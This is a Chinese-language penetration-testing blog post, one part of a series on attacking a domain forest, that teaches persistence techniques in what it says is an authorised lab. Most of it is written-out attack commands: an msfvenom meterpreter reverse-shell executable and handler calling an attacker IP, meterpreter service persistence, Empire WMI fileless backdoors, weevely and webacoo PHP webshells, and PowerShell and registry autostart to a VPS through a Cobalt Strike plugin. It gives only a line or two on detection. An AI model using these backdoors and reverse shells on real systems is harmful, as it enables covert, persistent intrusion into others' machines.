系列文章

专辑：渗透测试之地基篇

简介

渗透测试-地基篇

该篇章目的是重新牢固地基，加强每日训练操作的笔记，在记录地基笔记中会有很多跳跃性思维的操作和方式方法，望大家能共同加油学到东西。

请注意：

本文仅用于技术讨论与研究，对于所有笔记中复现的这些终端或者服务器，都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，本站及作者概不负责。

名言：

你对这行的兴趣，决定你在这行的成就！

一、前言

渗透测试人员需谨记《网络安全法》，根据《网络安全法》所示，未经授权的渗透测试都是不合法的，不管是出于何种目的。红队渗透人员在进行渗透期间，渗透测试的行为和项目必须在被渗透方授予权限可渗透后，才可进行渗透测试操作。

如今有一家dayu公司，需要对自己的业务以及整体的内网框架体系进行隐患挖掘，授予权限我进行对dayu公司的渗透测试操作，在签署了双方的《渗透测试授权书》后，我开始了对dayu公司的渗透之旅。

跳开思维讲，我此篇内容是内网渗透篇章，通过我的专栏：

社工钓鱼 -> 免杀过全杀软 -> 内网渗透 

那么我通过了社工钓鱼的各种方式，将钓鱼文件进行免杀后，成功钓鱼到了该公司外围人员计算机，并控制了该计算机权限获得shell，并成功登录对方电脑。

通过前期对域用户大量的信息收集，画出了相对应的简单网络拓扑图，下一步需要进攻子域控制器，思路如下：

域普通用户 -> 子域控制器 -> 父域控制器 -> 辅域控制器 -> 财务独立域

通过该思路进攻即可，还有另外一条思路：

域普通用户 -> 10.10.21.0/24二级区域 -> 父子域控制器 -> 横向延伸（财务独立域10.10.21.0/24）

渗透人员最爱系统之一有kali，还有各类windows集成的武器库系统，通过前几期的域森林专辑文章中利用隐藏通道技术、权限提升、横向攻击、域控安全技术、跨域攻击、置零攻击等手段对公司进行了大面积渗透行为，今天我们就来对域森林中如何进行权限维持进行攻击，总结实战中会遇到的各种权限维持的方法，利用这些方法在内网中遨游！

不会权限维持的技术，就无法长久的控制系统进行维持攻击行为！

二、环境介绍

目前信息收集获得的网络情况：（模拟环境）
拓扑图简介
为了更好的演示接下来的渗透和回看总拓扑图公司搭建环境情况：

单篇：渗透测试之地基内网篇：域森林中父子域和辅域用户搭建分析

在通常情况下攻击者成功贡献该服务器系统后，会利用权限维持进行植入后门，后门（backdoor）是一个留在目标主机上的软件，它可以使攻击者随时与目标主机进行连接。在大多数情况下，后门是一个运行在目标主机上的隐藏进程。因为后门可能允许一个普通的授权的用户控制计算机，所以攻击者经常使用后门来控制服务器。

本节将介绍实战中常用的权限维持方法进行攻击渗透！

三、meterpreter后门

1）首先生成exe后门：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.9 LPORT=4444 -f exe >1.exe

2)开启监听：

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.253.27; set lport 4444; exploit -j; "

3)执行后门上线：

4）查看帮助

run persistence -h

5）创建服务

run persistence -S -U -X -i 5 -p 443 -r 192.168.253.27

前面介绍-S需要（system）权限才能执行创建，这里是可以的，只需要system权限即可！不管关机重启后都可以上线！

四、WMI 型后门

WMI型后门只能由具有管理员权限的用户运行。WMI型后门通常是用PowerShell编写的可以直接从新的WMI属性中读取和执行后门代码、给代码加密。通过这种方法，攻击者可以在系统中安装一个具有持久性的后门，且不会在系统磁盘中留下任何文件。

WMI型后门主要使用了WMI的两个特征，即无文件和无进程。其基本原理是：将代码加密存储于WMI中，达到所谓的"无文件"；当设定的条件被满足时，系统将自动启动PowerShell 进程去执行后门程序，执行后，进程将会消失(持续时间根据后门的运行情况而定，一般是几秒)。达到所谓的"无进程"。

1）在Empire下使用Invoke-WMI模块：

searchmodule wmi

多个模块！

usemodule persistence/elevated/wmi
info
set DailyTime 16:10
set Listener dayu
run

检查目标主机主是否存在WMI后门：

Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer -FILTER "Name='Updater'"

清除WMI后门得到方法：删除自动运行列表中的恶意WMI条目，在powershell中用get-wmiobject命令删除与WMI持久化的组件。

五、Web后门分析与防范

Web后门俗称WebShell，是一段包含 ASP、ASP.NET、PHP、JSP程序的网页代码。这些代码都运行在服务器上。攻击者会通过一段精心设计的代码，在服务器上进行一些危险的操作，以获取某些敏感的技术信息，或者通过渗透和提权来获得服务器的控制权。IDS、杀毒软件和安全工具一般都能将攻击者设置的Web后门检测出来。不过，有些攻击者会编写专用的Web后门来隐藏自己的行为。

1、weevely后门

weevely 是款用 Python语言编写的针对PHP平台的WebShell 其主要功能如下：

1. 执行命令和测览远程文件。
2. 检测常见的服务器配置问题。
3. 创建TCP Shell和Reverse Shell,
4. 打扫描端口。
5. 安装HTTP代理。

weevely <url> <password> [cmd]    #连接一句话
weevely session <path> cmd    #加载会话文件
weevely generate <password> <path>    生成后门代理

生成一句话并上传至目标服务器：

weevely generate test test.php

执行命令生成一个webshell，将其保存为test.php，test为密码。

将test上传到目标服务器中，随意拿个测试即可，在浏览器输入webshell的地址。

然后输入：

weevely http://1.1.1.6/test.php test123

help：

audit_suidsgid    通过SUID和SGID查找文件，
audit_filesystem    用于进行错误权限审计的系统文件。
audit_etcpasswd    通过其他方式获取的密码，
shell_php    执行PHP命令。
shell_sh     执行Shell命令。
shell_su     利用su命令提权。
system_extensions    收集PHP和Web服务器的延伸列表，
system_info        收集系统信息。
backdoor_tcp     在TCP端口处生成一个后门。
sql_dump         导出数据表。
sql_console      执行SQL查询命令或者启动控制台。
net_ifconfig     获取目标网络的地址。
net_proxy        通过本地HTTP端口设置代理。
net_scan        扫描TCP端口。
net_curl        远程执行HTTP请求。
net_phpproxy    在目标系统中安装PHP代理。

扫描主机端口：

net scan 192.168.1.55 1-65535

通过以上方法可以进行多样式的权限维持！

2、webacoo后门

kali自带，直接利用kali即可。

1)安装：

apt install webacoo

2）生成shell

webacoo -g -o 123.php

3）连接后门

webacoo -t -u http://192.168.x.x/123.php

通过webacoo直接连接后门即可，只要对方服务器未关闭即可连接！

六、Dayu插件权限维持

Cobaltstrike是实战用最常见的后渗透神器，那么我自己写了一款插件进行多方面的攻击渗透，权限维持也是必不可少的！接下来将介绍插件中权限维持的方法！

1、权限提升

选择插件中的权限提升-MS14-058成功提权为system权限的shell，接下来即可开始权限维持攻击演示！

2、权限维持

1）设置后门地址

填写VPS公网服务器地址即可！

2）设置powershell命令

这里选择powershell作为演示，利用CS生成powershell一句话即可：
将一句话放入，确定即可！

3、powershell服务自启动

这时候会模拟一遍，上线一个powershell的system权限shell！

4、注册表自启

两个都操作一遍后，开始演示！

5、实战演示维持

现在将公司的电脑关机，然后shell会自动全部断开结束，开机后会自动上线执行powershell一句话，上线的木马也会是powershell后门进程支撑的shell!

重启后，所有shell已经断开！

可看到对方第二天开机后，还未登录用户名密码进入系统，就已经成功上线powershell获得了shell，并成功能执行命令，虽然对方是普通用户，但是我们是system权限执行的权限维持，所以直接获得system权限的shell！

七、总结

本章权限维持总结了Meterpreter后门、WMI后门、CS-Dayu插件权限维持，这几种方法在如今也是比较实用的，可以进行联动多种方法，甚至学习后也可以自查本地系统是否被植入该后门成为肉鸡等，希望小伙伴们学到更多的技术！加油~

公司域森林搭建 -> 域森林信息收集上 -> 域森林信息收集下 -> 域森林通信隧道建立上 -> 域森林通信隧道建立下 -> 域森林中权限提升上 -> 域森林中权限提升中 -> 域森林中权限提升下 -> 域森林中横向移动（上）-> 域森林中横向移动（中）-> 域森林中横向移动（下）-> 域森林中域控制安全（上）-> 域森林中域控制安全（下）-> 域森林中跨域攻击（总）-> 域森林中置零攻击（总）-> 域森林中权限维持（上）-> 域森林中权限维持（中）-> 域森林中权限维持（下）......

接下来在《域森林中权限维持（下）》中会接触到如何对进行权限维持攻击行为，如果在对方关机防御措施后进行再次控制对方系统等行为，如何建立内网渗透框架一步步攻击该公司内网环境的思路和方法，请看下篇域森林中跨域攻击篇章！

希望大家提高安全意识，没有网络安全就没有国家安全！

今天基础牢固就到这里，虽然基础，但是必须牢记于心。

作者：大余